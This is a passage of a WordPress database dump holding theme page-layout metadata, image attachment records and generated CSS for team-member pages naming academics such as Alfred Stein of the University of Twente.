(14872,2847,'_dt_fancy_header_bg_overlay','0'),
(14873,2847,'_dt_fancy_header_overlay_color','#000'),
(14874,2847,'_dt_fancy_header_bg_overlay_opacity','50'),
(14875,2847,'_dt_fancy_header_scroll_effect','default'),
(14876,2847,'_dt_fancy_header_bg_parallax','0.5'),
(14877,2847,'_dt_fancy_header_responsiveness_heading',''),
(14878,2847,'_dt_fancy_header_responsiveness','enabled'),
(14879,2847,'_dt_fancy_header_responsiveness_switch','778px'),
(14880,2847,'_dt_fancy_header_responsive_height','70'),
(14881,2847,'_dt_fancy_header_responsive_font_size','30'),
(14882,2847,'_dt_fancy_header_responsive_title_line_height','38'),
(14883,2847,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(14884,2847,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(14885,2847,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(14886,2847,'_dt_teammate_options_go_to_single','1'),
(14887,2847,'_dt_teammate_options_position',''),
(14888,2847,'_dt_teammate_options_website',''),
(14889,2847,'_dt_teammate_options_mail',''),
(14890,2847,'_dt_teammate_options_facebook',''),
(14891,2847,'_dt_teammate_options_twitter',''),
(14892,2847,'_dt_teammate_options_dribbble',''),
(14893,2847,'_dt_teammate_options_you-tube',''),
(14894,2847,'_dt_teammate_options_rss',''),
(14895,2847,'_dt_teammate_options_delicious',''),
(14896,2847,'_dt_teammate_options_flickr',''),
(14897,2847,'_dt_teammate_options_lastfm',''),
(14898,2847,'_dt_teammate_options_linkedin',''),
(14899,2847,'_dt_teammate_options_vimeo',''),
(14900,2847,'_dt_teammate_options_tumbler',''),
(14901,2847,'_dt_teammate_options_pinterest',''),
(14902,2847,'_dt_teammate_options_devian',''),
(14903,2847,'_dt_teammate_options_skype',''),
(14904,2847,'_dt_teammate_options_github',''),
(14905,2847,'_dt_teammate_options_instagram',''),
(14906,2847,'_dt_teammate_options_stumbleupon',''),
(14907,2847,'_dt_teammate_options_behance',''),
(14908,2847,'_dt_teammate_options_px-500',''),
(14909,2847,'_dt_teammate_options_tripedvisor',''),
(14910,2847,'_dt_teammate_options_vk',''),
(14911,2847,'_dt_teammate_options_foursquare',''),
(14912,2847,'_dt_teammate_options_xing',''),
(14913,2847,'_dt_teammate_options_weibo',''),
(14914,2847,'_dt_teammate_options_odnoklassniki',''),
(14915,2847,'_dt_teammate_options_research-gate',''),
(14916,2847,'_dt_teammate_options_yelp',''),
(14917,2847,'_dt_teammate_options_blogger',''),
(14918,2847,'_dt_teammate_options_soundcloud',''),
(14919,2847,'_dt_teammate_options_viber',''),
(14920,2847,'_dt_teammate_options_whatsapp',''),
(14921,2847,'_dt_teammate_options_reddit',''),
(14922,2847,'_dt_teammate_options_snapchat',''),
(14923,2847,'_dt_teammate_options_telegram',''),
(14924,2847,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(14925,2849,'_edit_lock','1665769563:1'),
(14926,2850,'_wp_attached_file','2022/10/w152.jpg'),
(14927,2850,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:158;s:6:\"height\";i:187;s:4:\"file\";s:16:\"2022/10/w152.jpg\";s:8:\"filesize\";i:53750;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w152-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7006;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14928,2849,'_thumbnail_id','2850'),
(14929,2849,'_edit_last','1'),
(14930,2849,'_dt_sidebar_position','disabled'),
(14931,2849,'_dt_sidebar_widgetarea_id','sidebar_1'),
(14932,2849,'_dt_sidebar_hide_on_mobile','0'),
(14933,2849,'_dt_footer_show','1'),
(14934,2849,'_dt_footer_widgetarea_id','sidebar_2'),
(14935,2849,'_dt_footer_hide_on_mobile','0'),
(14936,2849,'_dt_header_title','fancy'),
(14937,2849,'_dt_header_background','normal'),
(14938,2849,'_dt_header_background_below_slideshow','disabled'),
(14939,2849,'_dt_header_transparent_bg_color_scheme','light'),
(14940,2849,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(14941,2849,'_dt_header_transparent_top_bar_bg_opacity','25'),
(14942,2849,'_dt_header_transparent_bg_color','#000000'),
(14943,2849,'_dt_header_transparent_bg_opacity','50'),
(14944,2849,'_dt_header_disabled_background','normal'),
(14945,2849,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(14946,2849,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(14947,2849,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(14948,2849,'_dt_header_disabled_transparent_bg_color','#000000'),
(14949,2849,'_dt_header_disabled_transparent_bg_opacity','50'),
(14950,2849,'_dt_page_overrides_top_margin',''),
(14951,2849,'_dt_page_overrides_right_margin',''),
(14952,2849,'_dt_page_overrides_bottom_margin',''),
(14953,2849,'_dt_page_overrides_left_margin',''),
(14954,2849,'_dt_mobile_page_padding_top',''),
(14955,2849,'_dt_mobile_page_padding_right',''),
(14956,2849,'_dt_mobile_page_padding_bottom',''),
(14957,2849,'_dt_mobile_page_padding_left',''),
(14958,2849,'_dt_fancy_header_layout_heading',''),
(14959,2849,'_dt_fancy_header_title_aligment','center'),
(14960,2849,'_dt_fancy_header_height','300'),
(14961,2849,'_dt_fancy_header_padding-top','0px'),
(14962,2849,'_dt_fancy_header_padding-bottom','0px'),
(14963,2849,'_dt_fancy_header_breadcrumbs_heading',''),
(14964,2849,'_dt_fancy_header_breadcrumbs','disabled'),
(14965,2849,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(14966,2849,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(14967,2849,'_dt_fancy_header_title_heading',''),
(14968,2849,'_dt_fancy_header_title_mode','custom'),
(14969,2849,'_dt_fancy_header_title','Alfred Stein University of Twente, The Netherlands (WG IV/2)'),
(14970,2849,'_dt_fancy_header_title_font_size','30'),
(14971,2849,'_dt_fancy_header_title_line_height','36'),
(14972,2849,'_dt_fancy_header_text_transform','none'),
(14973,2849,'_dt_fancy_header_title_color_mode','color'),
(14974,2849,'_dt_fancy_header_title_color','#ffffff'),
(14975,2849,'_dt_fancy_header_subtitle_heading',''),
(14976,2849,'_dt_fancy_header_subtitle',''),
(14977,2849,'_dt_fancy_header_subtitle_font_size','18'),
(14978,2849,'_dt_fancy_header_subtitle_line_height','26'),
(14979,2849,'_dt_fancy_header_subtitle_text_transform','none'),
(14980,2849,'_dt_fancy_header_subtitle_color_mode','color'),
(14981,2849,'_dt_fancy_header_subtitle_color','#ffffff'),
(14982,2849,'_dt_fancy_header_bg_heading',''),
(14983,2849,'_dt_fancy_header_bg_color','#222222'),
(14984,2849,'_dt_fancy_header_bg_image_origin','custom'),
(14985,2849,'_dt_fancy_header_bg_image','a:0:{}'),
(14986,2849,'_dt_fancy_header_bg_repeat','no-repeat'),
(14987,2849,'_dt_fancy_header_bg_position_x','center'),
(14988,2849,'_dt_fancy_header_bg_position_y','center'),
(14989,2849,'_dt_fancy_header_bg_fullscreen','1'),
(14990,2849,'_dt_fancy_header_bg_overlay','0'),
(14991,2849,'_dt_fancy_header_overlay_color','#000'),
(14992,2849,'_dt_fancy_header_bg_overlay_opacity','50'),
(14993,2849,'_dt_fancy_header_scroll_effect','default'),
(14994,2849,'_dt_fancy_header_bg_parallax','0.5'),
(14995,2849,'_dt_fancy_header_responsiveness_heading',''),
(14996,2849,'_dt_fancy_header_responsiveness','enabled'),
(14997,2849,'_dt_fancy_header_responsiveness_switch','778px'),
(14998,2849,'_dt_fancy_header_responsive_height','70'),
(14999,2849,'_dt_fancy_header_responsive_font_size','30'),
(15000,2849,'_dt_fancy_header_responsive_title_line_height','38'),
(15001,2849,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(15002,2849,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(15003,2849,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(15004,2849,'_dt_teammate_options_go_to_single','1'),
(15005,2849,'_dt_teammate_options_position',''),
(15006,2849,'_dt_teammate_options_website',''),
(15007,2849,'_dt_teammate_options_mail',''),
(15008,2849,'_dt_teammate_options_facebook',''),
(15009,2849,'_dt_teammate_options_twitter',''),
(15010,2849,'_dt_teammate_options_dribbble',''),
(15011,2849,'_dt_teammate_options_you-tube',''),
(15012,2849,'_dt_teammate_options_rss',''),
(15013,2849,'_dt_teammate_options_delicious',''),
(15014,2849,'_dt_teammate_options_flickr',''),
(15015,2849,'_dt_teammate_options_lastfm',''),
(15016,2849,'_dt_teammate_options_linkedin',''),
(15017,2849,'_dt_teammate_options_vimeo',''),
(15018,2849,'_dt_teammate_options_tumbler',''),
(15019,2849,'_dt_teammate_options_pinterest',''),
(15020,2849,'_dt_teammate_options_devian',''),
(15021,2849,'_dt_teammate_options_skype',''),
(15022,2849,'_dt_teammate_options_github',''),
(15023,2849,'_dt_teammate_options_instagram',''),
(15024,2849,'_dt_teammate_options_stumbleupon',''),
(15025,2849,'_dt_teammate_options_behance',''),
(15026,2849,'_dt_teammate_options_px-500',''),
(15027,2849,'_dt_teammate_options_tripedvisor',''),
(15028,2849,'_dt_teammate_options_vk',''),
(15029,2849,'_dt_teammate_options_foursquare',''),
(15030,2849,'_dt_teammate_options_xing',''),
(15031,2849,'_dt_teammate_options_weibo',''),
(15032,2849,'_dt_teammate_options_odnoklassniki',''),
(15033,2849,'_dt_teammate_options_research-gate',''),
(15034,2849,'_dt_teammate_options_yelp',''),
(15035,2849,'_dt_teammate_options_blogger',''),
(15036,2849,'_dt_teammate_options_soundcloud',''),
(15037,2849,'_dt_teammate_options_viber',''),
(15038,2849,'_dt_teammate_options_whatsapp',''),
(15039,2849,'_dt_teammate_options_reddit',''),
(15040,2849,'_dt_teammate_options_snapchat',''),
(15041,2849,'_dt_teammate_options_telegram',''),
(15042,2849,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(15043,2851,'_edit_lock','1665769642:1'),
(15044,2852,'_wp_attached_file','2022/10/w153.jpg'),
(15045,2852,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:142;s:6:\"height\";i:191;s:4:\"file\";s:16:\"2022/10/w153.jpg\";s:8:\"filesize\";i:34812;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w153-142x150.jpg\";s:5:\"width\";i:142;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4547;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15046,2851,'_thumbnail_id','2852'),
(15047,2851,'_edit_last','1'),
(15048,2851,'_dt_sidebar_position','disabled'),
(15049,2851,'_dt_sidebar_widgetarea_id','sidebar_1'),
(15050,2851,'_dt_sidebar_hide_on_mobile','0'),
(15051,2851,'_dt_footer_show','1'),
(15052,2851,'_dt_footer_widgetarea_id','sidebar_2'),
(15053,2851,'_dt_footer_hide_on_mobile','0'),
(15054,2851,'_dt_header_title','fancy'),
(15055,2851,'_dt_header_background','normal'),
(15056,2851,'_dt_header_background_below_slideshow','disabled'),
(15057,2851,'_dt_header_transparent_bg_color_scheme','light'),
(15058,2851,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(15059,2851,'_dt_header_transparent_top_bar_bg_opacity','25'),
(15060,2851,'_dt_header_transparent_bg_color','#000000'),
(15061,2851,'_dt_header_transparent_bg_opacity','50'),
(15062,2851,'_dt_header_disabled_background','normal'),
(15063,2851,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(15064,2851,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(15065,2851,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(15066,2851,'_dt_header_disabled_transparent_bg_color','#000000'),
(15067,2851,'_dt_header_disabled_transparent_bg_opacity','50'),
(15068,2851,'_dt_page_overrides_top_margin',''),
(15069,2851,'_dt_page_overrides_right_margin',''),
(15070,2851,'_dt_page_overrides_bottom_margin',''),
(15071,2851,'_dt_page_overrides_left_margin',''),
(15072,2851,'_dt_mobile_page_padding_top',''),
(15073,2851,'_dt_mobile_page_padding_right',''),
(15074,2851,'_dt_mobile_page_padding_bottom',''),
(15075,2851,'_dt_mobile_page_padding_left',''),
(15076,2851,'_dt_fancy_header_layout_heading',''),
(15077,2851,'_dt_fancy_header_title_aligment','center'),
(15078,2851,'_dt_fancy_header_height','300'),
(15079,2851,'_dt_fancy_header_padding-top','0px'),
(15080,2851,'_dt_fancy_header_padding-bottom','0px'),
(15081,2851,'_dt_fancy_header_breadcrumbs_heading',''),
(15082,2851,'_dt_fancy_header_breadcrumbs','disabled'),
(15083,2851,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(15084,2851,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(15085,2851,'_dt_fancy_header_title_heading',''),
(15086,2851,'_dt_fancy_header_title_mode','custom'),
(15087,2851,'_dt_fancy_header_title','John W.Z. Shi The Hong Kong Polytechnic University, Hong Kong, China (WG IV/2)'),
(15088,2851,'_dt_fancy_header_title_font_size','30'),
(15089,2851,'_dt_fancy_header_title_line_height','36'),
(15090,2851,'_dt_fancy_header_text_transform','none'),
(15091,2851,'_dt_fancy_header_title_color_mode','color'),
(15092,2851,'_dt_fancy_header_title_color','#ffffff'),
(15093,2851,'_dt_fancy_header_subtitle_heading',''),
(15094,2851,'_dt_fancy_header_subtitle',''),
(15095,2851,'_dt_fancy_header_subtitle_font_size','18'),
(15096,2851,'_dt_fancy_header_subtitle_line_height','26'),
(15097,2851,'_dt_fancy_header_subtitle_text_transform','none'),
(15098,2851,'_dt_fancy_header_subtitle_color_mode','color'),
(15099,2851,'_dt_fancy_header_subtitle_color','#ffffff'),
(15100,2851,'_dt_fancy_header_bg_heading',''),
(15101,2851,'_dt_fancy_header_bg_color','#222222'),
(15102,2851,'_dt_fancy_header_bg_image_origin','custom'),
(15103,2851,'_dt_fancy_header_bg_image','a:0:{}'),
(15104,2851,'_dt_fancy_header_bg_repeat','no-repeat'),
(15105,2851,'_dt_fancy_header_bg_position_x','center'),
(15106,2851,'_dt_fancy_header_bg_position_y','center'),
(15107,2851,'_dt_fancy_header_bg_fullscreen','1'),
(15108,2851,'_dt_fancy_header_bg_overlay','0'),
(15109,2851,'_dt_fancy_header_overlay_color','#000'),
(15110,2851,'_dt_fancy_header_bg_overlay_opacity','50'),
(15111,2851,'_dt_fancy_header_scroll_effect','default'),
(15112,2851,'_dt_fancy_header_bg_parallax','0.5'),
(15113,2851,'_dt_fancy_header_responsiveness_heading',''),
(15114,2851,'_dt_fancy_header_responsiveness','enabled'),
(15115,2851,'_dt_fancy_header_responsiveness_switch','778px'),
(15116,2851,'_dt_fancy_header_responsive_height','70'),
(15117,2851,'_dt_fancy_header_responsive_font_size','30'),
(15118,2851,'_dt_fancy_header_responsive_title_line_height','38'),
(15119,2851,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(15120,2851,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(15121,2851,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(15122,2851,'_dt_teammate_options_go_to_single','1'),
(15123,2851,'_dt_teammate_options_position',''),
(15124,2851,'_dt_teammate_options_website',''),
(15125,2851,'_dt_teammate_options_mail',''),
(15126,2851,'_dt_teammate_options_facebook',''),
(15127,2851,'_dt_teammate_options_twitter',''),
(15128,2851,'_dt_teammate_options_dribbble',''),
(15129,2851,'_dt_teammate_options_you-tube',''),
(15130,2851,'_dt_teammate_options_rss',''),
(15131,2851,'_dt_teammate_options_delicious',''),
(15132,2851,'_dt_teammate_options_flickr',''),
(15133,2851,'_dt_teammate_options_lastfm',''),
(15134,2851,'_dt_teammate_options_linkedin',''),
(15135,2851,'_dt_teammate_options_vimeo',''),
(15136,2851,'_dt_teammate_options_tumbler',''),
(15137,2851,'_dt_teammate_options_pinterest',''),
(15138,2851,'_dt_teammate_options_devian',''),
(15139,2851,'_dt_teammate_options_skype',''),
(15140,2851,'_dt_teammate_options_github',''),
(15141,2851,'_dt_teammate_options_instagram',''),
(15142,2851,'_dt_teammate_options_stumbleupon',''),
(15143,2851,'_dt_teammate_options_behance',''),
(15144,2851,'_dt_teammate_options_px-500',''),
(15145,2851,'_dt_teammate_options_tripedvisor',''),
(15146,2851,'_dt_teammate_options_vk',''),
(15147,2851,'_dt_teammate_options_foursquare',''),
(15148,2851,'_dt_teammate_options_xing',''),
(15149,2851,'_dt_teammate_options_weibo',''),
(15150,2851,'_dt_teammate_options_odnoklassniki',''),
(15151,2851,'_dt_teammate_options_research-gate',''),
(15152,2851,'_dt_teammate_options_yelp',''),
(15153,2851,'_dt_teammate_options_blogger',''),
(15154,2851,'_dt_teammate_options_soundcloud',''),
(15155,2851,'_dt_teammate_options_viber',''),
(15156,2851,'_dt_teammate_options_whatsapp',''),
(15157,2851,'_dt_teammate_options_reddit',''),
(15158,2851,'_dt_teammate_options_snapchat',''),
(15159,2851,'_dt_teammate_options_telegram',''),
(15160,2851,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(15161,2847,'rs_page_bg_color',''),
(15162,2849,'rs_page_bg_color',''),
(15163,2851,'rs_page_bg_color',''),
(15164,2798,'the7_shortcodes_dynamic_css','a:2:{s:32:\"362ee46291fe96504ecc86468d076895\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width 